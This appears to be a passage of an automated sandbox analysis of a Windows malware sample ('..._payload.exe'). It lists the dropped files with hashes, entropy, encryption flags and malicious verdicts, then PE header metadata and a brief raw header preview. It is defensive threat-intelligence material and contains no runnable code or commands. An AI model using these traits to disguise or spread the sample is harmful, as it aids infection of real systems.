                                                                                                                                                                      SHA-512:B5F23E6D4495F15A297F4E2EFD0B55FC06078E9E7398D8FE624FF096C190E739AEBC8BE77320EBA801B2A9D84376A65BCFB3701DAE0089888BB1A29A97A0D86A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22093
                                                                                                                                                                      Entropy (8bit):7.991654534970632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:rSMBmV2FC6VlnabCWh6mJO1o9RYanzwgcN9Uvju4ygu+vpFV+:rvmV2PnabMmJOgogyZB
                                                                                                                                                                      MD5:B00DCA29F41A400044C6B84B564EC7FC
                                                                                                                                                                      SHA1:046FA92A2B897489243DEA3C65FC01034567A81D
                                                                                                                                                                      SHA-256:1DAED82B114FEE04C0D0991F6A0F62DE17972625122FB78F624D9C14EBDEF2C5
                                                                                                                                                                      SHA-512:38C274E0A545ECAF661E532EBE5BC3CB7F060AD636A33959D4134F2746D7EFBD0D98DAC918A0EC8657FC666D77AA9C2E09D3DF1F016A1C4EEC12ABDA9C87E726
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66542
                                                                                                                                                                      Entropy (8bit):7.99743314954008
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:ViXn+uL8e/m6KSrNOMRgWpKj6OvATtj3ptV:ViXnr8e/wSrQYzpKjFObptV
                                                                                                                                                                      MD5:2603DA37257A8A247FB2C33FF9CF3958
                                                                                                                                                                      SHA1:3E107A84DD60774EEA2476378258126EA0DAE9DF
                                                                                                                                                                      SHA-256:F73B072B091AD2025929FBD13236992DB95CF19528EF8B500CF958BF3FDB05E9
                                                                                                                                                                      SHA-512:BE9FDDF5EBBECDDBE12B14CC04BD8F2C712FAF51862122B886361D372CFA93074FAADA742BF2ED8A991ABD683FEB5B036225477521FB7096CE3FB59A9EDA07E4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                      Entropy (8bit):7.803891580628994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yYYz45hYHQm9CyoP1PKDBbRdfe5gknybYdCoQcoqyuP2bD:yYs5wbP12B9oOknybYdCZD
                                                                                                                                                                      MD5:A850838C81B8F9B4E3D45C7867ED3392
                                                                                                                                                                      SHA1:C280EE636A54B4DF84BDAE815064A772A975C032
                                                                                                                                                                      SHA-256:690B3FE2C2FD65F04A6638E7F544115C17B4D52806E435DCED2AD589A650D9A5
                                                                                                                                                                      SHA-512:195A3C546F9F2D53FB8B6AD8B4039674DB045ED511604F17E080723BA460C80751203944F591DFC3B3A31254EC1D0B41CAD0852EC708419BB411DD396CF65562
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662049
                                                                                                                                                                      Entropy (8bit):6.820736284713287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:+mpCFZK0nPRMf5t/EpwSkpyY8hLhzivQiifjhsLT3DZePTVakbYwsqVhKXHgjSD/:+mpQZ7Y5dEvYUL9cQiee/t4P+qVKTpp
                                                                                                                                                                      MD5:A05B5C31EF412F9D1A0635F4ABC5FB14
                                                                                                                                                                      SHA1:74774DDAA4DDFB668262AE4F84B935B9A7ADA5E8
                                                                                                                                                                      SHA-256:5AF963D4D9B175E10D8EE3D104EF17300143815DD907BF133BCA23674A057873
                                                                                                                                                                      SHA-512:2DCB17DFF578C0D86258B0C643E6645CAEFFEC5BC0F19ACA8AE912362FF119B0A63E4CCC3B12F9D2B852F02E87355243B29B0548E2F5DA1B15E8509A06DBA6A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):193297
                                                                                                                                                                      Entropy (8bit):7.871132317136255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:D5ErIAnKBjWerxLtPpk76TXC4pVojpCYPmuihm/+DaClwc6/O8Wv+lWRQ5ukyS68:D5KIAnKtWuLtPQP+VHgmM+D5SBWmlsQH
                                                                                                                                                                      MD5:88D5CD2B2B159775F4FDCA2E7366636C
                                                                                                                                                                      SHA1:20EBF41A7CDCB0572BD7B4A60D1C8A4F9E3BB917
                                                                                                                                                                      SHA-256:3B5FAACCF50E761C5AEF518BC936157B31D10C9DDE8E132860CA15549023A185
                                                                                                                                                                      SHA-512:7196F7DF982245D19F3085B3BAC39E15D33C3B26F8C15715FCC8BDBABF5338FC02E64FA780C849E5870509AFBD62FA918101EDE38389DEC2D9C6CD70EFF2F9CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240241
                                                                                                                                                                      Entropy (8bit):7.548304848862768
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ho9Cl+Zhe+/lQWUIhBPIaSEHCVoWYxsmht:i0opdUuPIalHCVo3
                                                                                                                                                                      MD5:C159C179D4F51D7049E29F8F566F633B
                                                                                                                                                                      SHA1:6999C63F2452341E878B8096A540604A2E82416C
                                                                                                                                                                      SHA-256:A8250DAD104225F5056EC566B245D4E6B982CE975C8EADE753A020ECDE0A4236
                                                                                                                                                                      SHA-512:60DB792A26BFC8EC194F43D79D91226803240431FBD26A9DF5380B116F3C73A07A03F6C70319AC154FCC439CF975024C6F92C71ED982C3C4833DB01BAF37B95C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1151310
                                                                                                                                                                      Entropy (8bit):6.929373407480307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:gt0j/KGxOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7W:m2uwAYZt6C31WeTVRPOhd7Uq7W
                                                                                                                                                                      MD5:4605FB1CE589925B9EE6DAFA3EC49F4B
                                                                                                                                                                      SHA1:11788700DB14C5D2B87595C3C703355A281AE5D6
                                                                                                                                                                      SHA-256:98133353158CFE6173CFE7CE1A6EFFAC016BDE005433A4B6D00581C25A44CEBA
                                                                                                                                                                      SHA-512:8FB7702392B3CF8984C3D4978251990411E3E974DC5A0373831D48EB56E55D4CD01ACD6EF38743E9E37A0ADBDD24E6437864BA71D28EC6FA0199959415458422
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997616686237543
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kmVKdWUiDDkzdx171LWyljK1k92EER8mm0ps09g3ZZxvYTf3pX7:ZaisRx1719N2kUEl0pX96ZxvYTxL
                                                                                                                                                                      MD5:5BEAB8757C3E333F7DA0E3CF6111FCE3
                                                                                                                                                                      SHA1:344F87AB4CD128AE699F272BD0558E2AA08D440F
                                                                                                                                                                      SHA-256:7F53B2A7E9FE928855B2C939E0E6FB90035F411B85857FD1C944E8264E2617FF
                                                                                                                                                                      SHA-512:5E04ACCBCA6F2BCB4457D043D739AE0F1051F495DF97E64B7612AB7F852394E205D1C9E858184405BC0D740A5450E9913B79AD45BAAFCF97C11E0A09380F6E76
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997008322080646
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:W9PPDVhPFyxCRq42/ANVpHCdMowiO4KQ1ozfVkXR2g4x:WpPRNFygRMAXpiGowiu4WVA8
                                                                                                                                                                      MD5:353E6C2D5A794933FD8D11C0EC928C3B
                                                                                                                                                                      SHA1:7B92D4E05C7057B68AAEC5651A38F48A417A502B
                                                                                                                                                                      SHA-256:41847B2BE27CADA70044A673EE97AA32BC3FCFA5F698956080AFB5E3E52B2EEB
                                                                                                                                                                      SHA-512:D645AE741784F28E0716305E918481DEC0ED9752C4CB068B736D10B253C67CCB47044402259AE00110909675A2B4981E45B8B41BD046B1002F4321F06BD0DD68
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997145089990632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yuu3KIt08khtn03FoY8490zxPmMyu8yJotU/5Eh5Tz3mOJsuXdPovYa:yuJKkhBOFCFPmnUOhLDDFoga
                                                                                                                                                                      MD5:B0195F01DFA88DCD06D18494E3006596
                                                                                                                                                                      SHA1:31FC930A940CFE6ADC59818831ABA78233658CB2
                                                                                                                                                                      SHA-256:3AF53E17A309941CBF2A71D9ECEB791414714B1D6D1A055EE8B1910EB9BA2B8E
                                                                                                                                                                      SHA-512:89DDF74985CFB8CC14C848943FC1B090B350B740EF6C0939D60934AC5B7021CEB5D88FC8B44000CCB70DAC9646F7E57358DF370A9484A1E2A0253CABCFAAE2EF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1601198
                                                                                                                                                                      Entropy (8bit):7.987451630407055
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:SDK0o270SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:S20L24gQu3TPZ2psFkiSqwozt
                                                                                                                                                                      MD5:7C75E2492E46302276B04D541D5797F4
                                                                                                                                                                      SHA1:88696AB0356824BA6A68ECD1A852E20257F24D0D
                                                                                                                                                                      SHA-256:D5C1EABDA90071846750011C06E82089C066D8B943367B263CCDAD5278D6F320
                                                                                                                                                                      SHA-512:03E2603F5DF1EB88F7BC6108BAB16197AC854313258B384B1F87A72645B58B363F00D9D702FFD83C4130AC8FA0DAD96EC908969CA24821D593E07357271B0EE2
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.9973360230375885
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:Irm+kbCdaJ07MpZ3txMfrSEnpbQboZZ54T7muF/3/Ae:Ia+rdai7oZ3zMLp8O+L3/x
                                                                                                                                                                      MD5:833F127D60D70FA87D8C25106C33B238
                                                                                                                                                                      SHA1:829BC64EC4B43311BFF1491F099BA1F6585888BD
                                                                                                                                                                      SHA-256:8B55287CCB43AB284610F070B8813C8DC0861E9C0F1114CCB6932EE262FE4710
                                                                                                                                                                      SHA-512:856F651585DA0EB2A149AAEE675D20569157F5F4EE1AF992AAC865A78C6E2FE2568D58B3E0E555C865070B5C3F432C10E7562C535B8CDEA552EF09CBBD564D83
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997269298719015
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:1qoQ1g/PUZVijg/q6GhyFiXWHkyBYh4peoD3CV:aZVijzhDwCmM
                                                                                                                                                                      MD5:23AFA38672E5306295BCEC4CFF8F2FB7
                                                                                                                                                                      SHA1:5F60D42ADF89E69D0A2161686265EE6D508C596C
                                                                                                                                                                      SHA-256:D571222A65C88CF195C3F1BD2BE6F3B96E1F9098129A6D21F3A94294F25960EA
                                                                                                                                                                      SHA-512:92882014E5671634BBAF08F0DA7514B99D0A0102E1284E52289046E5C2A88AE970A1C74B27D8F9EB1994EAA4E7686E0019DD99CA3E65AADBE78F1A8C824637C1
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997262806942996
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:R69DpP6GJBaAqZRKQ4sIs1GuzbZrd1XYZr6aFwMKM16ZxvS4C6wB4/C:Gi8BaZZRKfsp1GuzbNd1XIkM16bvbcoC
                                                                                                                                                                      MD5:A657D9DB1213C7FFB33358E0ABF32E43
                                                                                                                                                                      SHA1:EB88D4D73B258EFD38CBFD92C4C797A0E7776707
                                                                                                                                                                      SHA-256:7D988E7DFC771DDA2481502AA102BCD7EEF11534D38B9405D50A872FC907681B
                                                                                                                                                                      SHA-512:5CC6DEA85B26C6ED599232337FC5386B1496495B9CBB5D01CA9F9B26235C6CA2A27A3871FE988DD319F0B4647AA933DBA79F69ACAEFA73F8B3C0FA95515088D9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997096675159365
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kUoQic0SAV/2T50IV4QbwHqkXpbrj8yCQjzuRhvOO:Wc0SAcWIV4prj8w8l
                                                                                                                                                                      MD5:B473D3EF1AA4AB1EACC6D64885F53020
                                                                                                                                                                      SHA1:76A96E04E7E384AFFF919F470C5A417E709704C0
                                                                                                                                                                      SHA-256:6FCF3B6200C166CB830DBD2C74F2E202E48C20D9F02ECA2CF399F17297B980AF
                                                                                                                                                                      SHA-512:FC80BEFF467A376107C9D7FF8804F84F628ACBAE2DC38B3AABD03BEBEFBA561A8F94474DC3F8FA97BF4E00079C1EE62199F62C85149EA19FB8A2203F5252DA26
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997584614740485
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9l45XdGE9ETBDUfx/D9BJFzCxUUZi4KT3mjOTnxZKvHS9oGVJa:9lwXrEyfV95CLKT3mjKxYaoCM
                                                                                                                                                                      MD5:89E271A948FAA15DB9E98B18625D202C
                                                                                                                                                                      SHA1:FE79D1C277507BF71D2B56D4D6CBA319BBE8AA24
                                                                                                                                                                      SHA-256:FF96A9E9DC3781F70C35F9BA378B7D3A7119D837001142F4D4BB5D77D1859275
                                                                                                                                                                      SHA-512:822C8605C85D717306DF796F821EAE8417CD76BE3D77B4C60F9B526D484C12E23075F8622A69377A28BF07F083FD8B482A8121BD09A6DB7A754B8881FF00874A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997211347285652
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:NeutngY44Ex562cIs7KbZ16KTGChrTXH/yNVnKbyP7CAe:NeCgY4XSI1EiXH/yNqg7Ct
                                                                                                                                                                      MD5:DC4604A65C5867D089BFC4C9848E9B53
                                                                                                                                                                      SHA1:4A4D1352F24CE3F9D1A76E47A814C0F42E494CF0
                                                                                                                                                                      SHA-256:9A5922697B5EDFC4E3A1A2D0FDBB1539ABF346CDD6DC56FA63E791D882BC6701
                                                                                                                                                                      SHA-512:EF7F6C1314BDBABE765F72B6D96C2C6AF9B5F06DA7A8CB55514AF1B04399829A6DD3F95929FA12513AB575F3C1998ABCE4BC8431FC05724AB8C235939E54BFE6
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997810212418462
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:dQVdBjEXV27bw36SEYandD5SzLLHFzh6Cl83TO9BE/0Zb8hhSv:mV7El2703XGeLHLH2KvE/0Z4Mv
                                                                                                                                                                      MD5:ADA388B8B0776F416D3F21C1F5569491
                                                                                                                                                                      SHA1:545F0BBF095646D5BE9B81546DB602CC2E6342B0
                                                                                                                                                                      SHA-256:B9BE681CD4E39976AB3D37FD078E8CF624794DE44AFFB8ECE343614FF51B72C0
                                                                                                                                                                      SHA-512:5DD9DE45C3828949BB1A522FE8E1A9CB559677121B01120A42C0240A71BEB8672773AB7AC9EA0FDA57D1091AD21255E7D32BBAA64977798C43CF2E2F602708FD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):42164934
                                                                                                                                                                      Entropy (8bit):7.947669527692684
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:786432:HwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:QQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                                                                                      MD5:A63E92C370B5B7528B392E48BF4AFF8B
                                                                                                                                                                      SHA1:84015AD81D6FBFB6157B57224A53EF5701292189
                                                                                                                                                                      SHA-256:2AE4E9F6E540AD0A1E58F09E54C6E5687EBCFA28C3CE7C80D10E673C96E7C8CA
                                                                                                                                                                      SHA-512:F8B45EDBDA434BA8059FE808A1A82BFFF1A4B078ED3E37AB4A6BD6D7862D6D58A29B5856019B09A19A2AEDF7B7BF9FC28499C4508131D51CCD12EF3DFE09CD75
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.7700730740248884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:twOexkBe2Pcal3WJEF8m33V+KvKFMLe42bD:qufPcgGU8m38prD
                                                                                                                                                                      MD5:AF4C389B634FECB5BFC56BBACA41F0DA
                                                                                                                                                                      SHA1:02462F8123CF7AA9371772CC631A18C4D5DCCA24
                                                                                                                                                                      SHA-256:E6CC9249F58EBA2D790EE3DEC96D1256C7F9ECE83CC71FDB11C95EB7FBE7E6B8
                                                                                                                                                                      SHA-512:424D6EA0033A7F281B96E6E8697ED6F45001E534E216BE9092B6954D0FB5A0B43EF813661FB1525C211BEAFA33349FBAC248C58D7BF552D85D5B1B6DE9760F00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.963935881177714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:g8RFI7egUGgfsf8AWrCFBzu4AJlPbD1Q+rIW7jw6+uqJPHolZgyf8v6OJTzMJKGq:gEFI63fsf8AWrCFByvPzDvIec6hiPHoc
                                                                                                                                                                      MD5:7C4DD34C54710A9B3CBDBF1A8628AC5D
                                                                                                                                                                      SHA1:017E2A18B71F3128F6E4BC35BFE768C43801015C
                                                                                                                                                                      SHA-256:5C6C369DB0BD843F51CC92CA7BDCDB09CDBC01667AB0C5CB127E4ACF50695BDC
                                                                                                                                                                      SHA-512:74DB20C3F0BD778E56752DB0D45C5C2368CBC0955ED2DAE1103A329A0001BB7903DF180A12E725CFC523BA13EBFC996EBE4B809F974F6EC9CC900A6BE6046C90
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.968940637033909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:PD1Yb/eyYeloW76IeAbUNHTAb4Gqvz+AY34m0RvSNhxH1T4x5f+c:P6b/eIUFHz+p0VG1T43Z
                                                                                                                                                                      MD5:9476D6CEBFD82873862A7ACBC0F466D3
                                                                                                                                                                      SHA1:90E9B443D5C9B749BDDCD7E609EACDDF9512D385
                                                                                                                                                                      SHA-256:F92CCFB332EBC70BE561D63E0D171F8539E49C483B15EB89A71CCB53CDAECA82
                                                                                                                                                                      SHA-512:378009B6C09993E4833E85025B3A181818C45E0CF50736A4138E25885ED1D079D2427AEE6CD0189996D81589B6E065F42C144ABC029BB6BAAF5CA6C0FE4B1035
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.971488518202093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:n66e0qcdt/Uf7vywt7LHr3up7Vv0SUUZHT92mHiKrodV:Mcdhuvyk7rrIsSUUZHT92mCaSV
                                                                                                                                                                      MD5:C473DC53B0D72DE51F6F81CC50C9A1A1
                                                                                                                                                                      SHA1:1B385EE28B11D4DE14851414BC27E075D96D8B05
                                                                                                                                                                      SHA-256:A194AED24CC086A5001D29BC2ED51F8F8EE285C2005C57121C7A61AAAE523E61
                                                                                                                                                                      SHA-512:3550B53B519411DEA7376C6EBAF54A5E74587FD952F8743BAC2027FBED87A91A319443D6B7F330044E94D57DB109EC6F2DE25C9E1E773C68FAB3725B0B92D61F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.969863558268538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:dPQr04Lwxvg6A/Mx0hfoBk4jyS/fPg907RnGUB/gOReSLKACOwtzV4Tz128BYmSj:5QrL56A/C/jFXDxjLKesZQ28BYmSj
                                                                                                                                                                      MD5:698C2CB4A3CEFBAD88760EE524A44DA6
                                                                                                                                                                      SHA1:3F76BDEA44DC4C8DF0ACDB5FE8CC0584EC69BCBA
                                                                                                                                                                      SHA-256:1C81AD0998A791F5F21B93D609BE161469488A40FE91C9E79473210826E798F5
                                                                                                                                                                      SHA-512:ED03CE30939D07790E532FA549B78035840D1ABE3D27158AF17126C0CABB84B56F47B315E88B58EDDD3852BF67906FB01DE8E0724EBB51B3968E7D4CBDACE7EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1193
                                                                                                                                                                      Entropy (8bit):7.8230145978908245
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:jkwFypVKlSPubSImS2agUujjoSuKJDGxB2pJUQrrIiMgyb4BH2bD:typkmubVmagUujjhgQPIiMsED
                                                                                                                                                                      MD5:C95A6816D4639FA4140B1A58FB6B463D
                                                                                                                                                                      SHA1:5FDCFB9A88E5D786E59EA2E547026B72E9E8FD98
                                                                                                                                                                      SHA-256:E38ED44AB2BDD8F27627A699DD23195C514B1B60E85A8A3984AEBE3950268950
                                                                                                                                                                      SHA-512:CF40B247E337BB2C19563451E37C648B9BB372AC5D7708D13BB3E517D1CD042E99AFBA983B4D56D3781CEE4FB0AC3801CE56E6C885E3463B3F8EDA5E5E615C31
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.657605522788283
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5:3eeb7b2030517f91fdf0f4c5278d8e76
                                                                                                                                                                      SHA1:c4c3a4650d278f2f8b9bf871c2ae91508ffae165
                                                                                                                                                                      SHA256:4ad7b8d228fe32d82b0373ce886f224f47c2e06a59d394c634160c70083b5f32
                                                                                                                                                                      SHA512:eaea7fa64c8bedf0698a12f16871c5a4caf19f4ce5576765d2d803568c8fe95ae4bef456c2c72f1591bda16fce412850889770a58a5e239e60a31633bfb7d110
                                                                                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7:F0dwAYZt6C31WeTVRPOhd7Uq7
                                                                                                                                                                      TLSH:CB35AE02BB819171E5D341BA0DFE977E883AA9A0933A95C3D7E91C568E306D0673F3C5
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l.....7.f.......+/..*...h.....9.m...../.m...a|..Q...a|7.s...a|........&.n.....8.n.....#.M...l...........d...a|3.m..
                                                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                                                      Entrypoint:0x424141
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x5D890137 [Mon Sep 23 17:30:31 2019 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                      Import Hash:0c756c849bc7b459f78f7a5ce46cd4a7
                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007F96C11DAAA2h
